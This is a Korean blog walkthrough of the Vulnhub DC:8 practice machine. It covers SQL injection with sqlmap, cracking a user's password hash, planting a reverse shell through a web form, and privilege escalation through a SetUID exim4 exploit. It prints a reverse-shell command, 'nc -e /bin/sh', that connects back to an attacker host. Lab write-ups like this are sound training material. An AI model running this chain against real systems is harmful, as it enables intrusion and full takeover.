일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- lord of sql injection
- MFT
- diva
- 안드로이드
- vulnhub
- XSS
- Openstack
- SQL Injection
- elasticsearch
- InsecureBank
- Docker
- Strings
- 파이썬
- foremost
- Reflected XSS
- NTFS
- 2018
- otter
- beebox
- kibana
- 인시큐어뱅크
- ESXi
- ctf
- frida
- igoat
- Suninatas
- Volatility
- logstash
- CTF-d
- base64
- Today
- Total
Information Security
Vulnhub DC : 8 본문
nmap을 이용해 해당 대역을 스캔했는 데 192.168.219.107 80/tcp port가 열려있는 것을 알 수 있다.
-A 옵션을 통해 192.168.219.107 열려있는 port를 자세히 확인했다.
192.168.219.107 페이지 접속해 페이지를 확인했다.
http://192.168.219.107/?nid=2' 입력 시 SQL Error를 확인할 수 있다.
sqlmap을 이용해 --dbs(DB 정보) --batch(기본 동작) --risk(위험 정도) --level(테스트 레벨) 옵션을 사용했다.
d7db, information_schema DB를 확인할 수 있다.
d7db 데이터 베이스를 같은 명령어로 조회했다.
users라는 table을 확인할 수 있다.
users라는 table을 dump를 떴다.
users라는 table에 admin, john의 계정을 확인할 수 있다.
john의 계정 passwd를 hash.txt에 저장 후 john the ripper를 이용해 turtle라는 password를 알 수 있다.
디렉터 리스팅 명령어 dirb를 이용해 http://192.168.219.107/user라는 페이지를 확인할 수 있다.
http://192.168.219.107/user/2 페이지 john/turtle 로그인을 하면 접속되는 것을 알 수 있다.
Contact Us -> Form settings 페이지 접속해 reverse shell 공격정보를 입력했다.
Form setting 설정 후 정보를 입력했다.
reverse shell이 동작 하는 것을 알 수 있다.
SetUID 설정되어 있는 것을 find 명령어를 이용해 검색했는 데 /usr/sbin/exim4가 수상해 보였다.
해당 파일의 버전 정보를 확인할 수 있다.
HTTP Server를 8000 port로 open 했다.
https://www.exploit-db.com/exploits/46996 사이트에서 Expolit 코드를 받은 후 dos2unix 명령어를 사용했다.
(텍스트를 처리하면서 Unix(Linux) 환경과 Windows(Dos) 환경의 차이로 인한 오류가 발생하기도 한다. 그중 많이 발생하는 오류가 개행 문자로 인한 오류가 된다.)
HTTP Server를 통해 exploit 코드 exploit.sh 파일을 다운로드하였다.
exploit.sh 파일의 권한을 777로 변경 후 ./exploit.sh -m netcat으로 실행했다.
5초 후 nc -e /bin/sh 192.168.219.114 7777 port로 연결을 시도했다.
미리 open 한 7777 port에 root 권한으로 접속이 되어 root 폴더에 flag.txt를 확인할 수 있다.
'VulnHub > DC' 카테고리의 다른 글
Vulnhub DC : 9 (0) | 2020.08.17 |
---|---|
Vulnhub DC : 6 (0) | 2020.08.02 |
Vulnhub DC: 5 (0) | 2020.08.01 |
Vulnhub DC:4 (0) | 2020.07.26 |
Vulnhub DC:2 (0) | 2020.07.19 |